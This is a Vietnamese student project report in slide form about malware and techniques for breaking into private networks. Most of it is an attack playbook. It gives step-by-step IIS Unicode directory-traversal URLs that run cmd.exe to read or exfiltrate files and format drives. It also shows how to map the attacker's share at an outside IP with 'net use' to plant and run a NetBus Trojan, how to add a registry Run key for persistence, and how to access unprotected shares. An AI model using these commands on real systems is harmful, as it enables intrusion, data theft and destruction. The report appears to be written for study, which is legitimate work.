Tải bản đầy đủ (.pdf) (27 trang)

Tìm hiểu một số phần mềm phá hoại và các giải pháp xâm nhập mạng riêng potx

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (522.52 KB, 27 trang )

1
BÁO CÁO ĐỒ ÁN
NGÀNH CÔNG NGHỆ THÔNG TIN
Đề tài:
TÌM HIỂU MỘT SỐ PHẦN MỀM PHÁ HOẠI &
CÁC GIẢI PHÁP XÂM NHẬP MẠNG DÙNG RIÊNG
CÓ KẾT NỐI INTERNET
Giáo viên hƣớng dẫn: TS. Hồ Văn Canh
Sinh viên : Vũ Thị Thu Hằng
Lớp : CT702
BỘ GIÁO DỤC VÀ ĐÀO TẠO
TRƯỜNG ĐH DLHP
2
NỘI DUNG CHÍNH
Chƣơng 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG
VÀ KỸ THUẬT XÂM NHẬP MẠNG
Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG
TRÊN MẠNG
Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU
Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ
TẤN CÔNG TRÊN MẠNG MÁY TÍNH
3
Chương 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG
VÀ KỸ THUẬT XÂM NHẬP MẠNG
 Thực trạng tấn công của tội phạm trên mạng
 Các phƣơng pháp tấn công
 Các kỹ thuật xâm nhập mạng
4
Thực trạng tấn công của tội phạm trên mạng
 Phần lớn các cuộc tấn công trên mạng đƣợc
thực hiện thông qua việc sử dụng một hoặc


nhiều công cụ phần mềm.
 Phần mềm phá hoại
 Các vụ tấn công trên mạng ngày càng gia
tăng cả về quy mô và tính chất nguy hiểm.
 Những kẻ viết virus có thể gia tăng khả năng
điều khiển lên virus của mình sau khi đã phát tán
chúng trên mạng.
5
Các phƣơng pháp tấn công
 Tấn công trực tiếp
 Nghe trộm
 Giả mạo địa chỉ
 Vô hiệu hoá các chức năng của hệ thống mục tiêu
 Sử dụng lỗi của ngƣời quản trị hệ thống
6
Các kỹ thuật xâm nhập mạng
 Rình mò (Snooping)
 Đánh lừa (Spoofing)
 Điệp viên (Agent)
7
Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG
TRÊN MẠNG
 Phát hiện điểm yếu trong cơ chế bảo mật của đối phƣơng
 Triệt để lợi dụng cửa sau để tấn công
 Tận dụng các công cụ sẵn có
 Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
 Nguyên tắc an toàn
 Nguyên tắc phối hợp tấn công
8

Phát hiện điểm yếu trong cơ chế bảo mật
của đối phƣơng
 Một hệ thống đảm bảo ANAT máy tính gồm :
 Yếu tố tổ chức.
 Yếu tố kỹ thuật, công nghệ.
 Có hai hƣớng tiếp cận để tìm các lỗ hổng bảo mật:
 Từ góc độ chiến thuật
 Từ góc độ kỹ thuật.
 Một số diễn đàn trao đổi về lỗi bảo mật:
uify, ,

9
Triệt để lợi dụng cửa sau để tấn công
 Việc đột nhập vào một hệ thống máy tính nào đó
nói chung là rất khó khăn, vì thế sau khi đột nhập
ngƣời ta muốn để lại một công cụ nào đó giúp dễ
dàng xâm nhập trong những lần sau.
 Backdoor / Trojan.
 Nguyên tắc hoạt động của Backdoor
Máy
tấn
công
Máy
đích
Giao tiếp bình thƣờng
Back
Back
Giao tiếp cửa sau
Hình 3.1.1:Mô hình hoạt động của backdoor
10

Tận dụng các công cụ sẵn có
 Sử dụng các công cụ để cấy Trojan lên một máy
khác thông qua chia sẻ tài nguyên trên máy đó:
 Công cụ bẻ khóa chia sẻ Passware Kit
().
 Copy file server của Netbus 1.7 (patch.exe) vào
thƣ mục bất kỳ ở ổ C:
 Sử dụng regedit.exe của Windows để nạp và sửa
đổi Registry máy đó (Remote Registry Service)
11
Tận dụng các công cụ sẵn có
 Thêm vào đó một khóa ở
HKEY_CURRENT_USER\Software\Microsoft\Wi
ndows\Current\Version\Run hoặc
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Current\Version\Run để chạy patch.exe:
Value type: String
Value name: Patch
Value data C:\windows\patch.exe
12
Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
 Phƣơng pháp tấn công IIS server bằng cách lợi
dụng lỗi Unicode “dot dot directory traversal attack”
(tấn công bằng cách lần ngƣợc thƣ mục do lỗi “dot
dot”).
 %c1%1c /winnt/syste
m32/cmd.exe?/c+dir+c:\
 Thay xâu con “ /”, “ \” bởi xâu unicode chứa một
đoạn mã hóa rất dài của ký tự “/” “\” nhƣ “%c1%1c”,

“ c0%f9”…
13
Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
 Khi thực thi, xâu “%c1%1c” đƣợc dịch trở lại
nguyên dạng ký tự “/”.
/ /winnt/system32/cm
d.exe?/c+dir+c:\
 Để xem nội dung file autoexec.bat:
%c1%1c /winnt/syste
m32/cmd.exe?/c+type+c:\autoexec .bat
 Để format lại ổ đĩa C:
%c1%1c /winnt/syste
m32/cmd.exe?/c+format+c:\+/q
14
Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
 Cũng có thể chiếm quyền ghi đĩa và thực hiện sửa
đổi, tạo mới file trên server:
+ Bƣớc 1: Tạo một bản sao mới cmd1.exe của trình
thông dịch lệnh DOS:
%c1%1c /winnt/syste
m32/cmd.exe?/c+copy+c:\winnt/system32/cmd.exe+c/win
nt/system32/cmd1.exe
+ Bƣớc 2: Ghi thêm một số lệnh vào file autoexec.bat:
%c1%1c /winnt/syste
m32/cmd.exe?/c+echo+>>+c:\autoexec.bat+@echo+Hihi
15
Nguyên tắc an toàn
 Sử dụng các procxy vô danh (Anonymous Proxy

Server).
 Để luôn có những thông tin về các proxy miễn phí, có thể
thƣờng xuyên truy cập các trang web
, .
 Sử dụng một số chƣơng trình nhằm tạo ra các proxy ảo
ngay trên máy của mình, nhƣ Anomity 4 proxy.
Hình 3.5.1: Mô hình giao tiếp giữa hai máy thông qua proxy.
Máy của ta Proxy Máy đối
phƣơng
Gửi yêu cầu
Trả lời
Gửi yêu cầu
Trả lời
16
Nguyên tắc phối hợp tấn công
Khám phá điểm yếu, lỗ hổng bảo mật
trong hệ thống mục tiêu
Sử dụng các công cụ để khai thác các
điểm yếu của hệ thống mục tiêu
Tiến hành các biện pháp tấn công,
thu thập thông tin
Tạo đƣờng ngầm (cửa sau),
cài cắm “điệp viên” nếu có thể
Xóa dấu vết
Ngụy trang
Hình 3.6.1: Sơ đồ thứ tự áp dụng các nguyên lý tấn công
17
Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU
 NETBUS
18

 WS_Ping ProPack ()
Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU
19
Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ
TẤN CÔNG TRÊN MẠNG MÁY TÍNH
 Tấn công máy mục tiêu bằng cách giành quyền điều
khiển hệ thống đó.
 HTTP (HypeTtext Transfer Protocol – giao thức
truyền siêu văn bản)
 Giao thức TFTP (Trivial File Transfer Protocol –
giao thức truyền file đơn giản)
 Giao thức NetBIOS (Network Basic Input/Output
System)
 Kết hợp công cụ quét tài nguyên đƣợc chia sẻ và
công cụ bẻ mật khẩu
20
Cách download và upload file trên IIS
mắc lỗi Unicode
 Khi cài IIS phiên bản từ 4.0 trở lên, FTP server cho phép
user truy cập vào thƣ mục \inetpub\ftoproot\ và download
các file từ đó:
+ Bƣớc 1: Copy file download (giả sử là file
c:\system.ini) vào thƣ mục \inetpub\ftoproot\ bằng URL:
%c1%1c /winnt/syste
m32/cmd.exe?/c+copy+c:\system.ini+c:\inetpub\ftoproot\
+ Bƣớc 2: Sử dụng FTP vô danh đăng nhập vào máy
tính đích download file system.ini về.
21
Cách download và upload file trên IIS
mắc lỗi Unicode

 Hạn chế: nó không cho phép download tất cả
các file.
 Windows NT và Windows 2000 lƣu trữ một bản
sao file SAM (Security Account Manager) trong
thƣ mục \WINNT\repair\, lƣu trữ thông tin về
account sử dụng hệ thống đã đƣợc mã hóa
22
Cách download và upload file trên IIS
mắc lỗi Unicode
 Bƣớc 1: Chia sẻ một ổ đĩa trên máy của mình, ổ C: , với
quyền truy nhập là “Full” và không có pass bảo vệ.Tên
chia sẻ (Share name) đƣợc đặt là “My Disk”.
 Bƣớc 2: Sử dụng lệnh “net use” trên IIS để ánh xạ (map)
“My Disk” (tức là ổ đĩa C: trên máy của mình) về thành
một ổ đĩa mới trên máy chủ phía đích, ổ G:
%c1%1c /winnt/syste
m32/cmd.exe?/c+net +use+G:+\\203.160.1.94\MyDisk
23
Cách download và upload file trên IIS
mắc lỗi Unicode
 Bƣớc 3: Ngƣời ta cần tìm một chƣơng trình điều khiển
máy tính, chép vào ổ C: (ổ G:\ trên máy đích) và dùng
trình duyệt copy lên đĩa cứng thực sự của server.
Trên ổ C: của ngƣời ta có Trojan netbus 1.7 với thành
phần server là Patch.exe, ngƣời ta sẽ thực hiện lệnh sau ở
trình duyệt:
%c1%1c /winnt/syste
m32/cmd.exe?/c+copy+g:\Patch.exe+c:\Patch.exe
24
Cách download và upload file trên IIS

mắc lỗi Unicode
 Bƣớc 4: Dùng lệnh “net use G:/delete” trên server để
ngắt liên kết đến ổ C: của mình:
%c1%1c /winnt/syste
m32/cmd.exe?/c+net+use+g:+\delete.
Bỏ việc “share” ổ đĩa C: để đảm bảo an toàn.
 Bƣớc 5: Chạy thành phần server của chƣơng trình điều
khiển từ xa trên máy đích thành phần client trên máy của
ta, kết nối vào và điều khiển máy đích.
25
Kết hợp công cụ quét tài nguyên đƣợc
chia sẻ và công cụ bẻ mật khẩu
 Để quét tài nguyên đƣợc chia sẻ trên máy mục tiêu,
dùng phần mềm WS_Ping ProPack với công cụ Scan.
 Để truy cập đến tài nguyên đó:
 Run\\<địa chỉ IP>\<tên tài nguyên>
 Để xem tài nguyên đó có share hay không sử dụng
câu lệnh C:\net view <địa chỉ IP> .
 Nếu tài nguyên đƣợc chia sẻ không có mật khẩu thì
truy nhập : net use <ổ đĩa bất kỳ trên máy của bạn > :
<ổ share của nạn nhân >.

×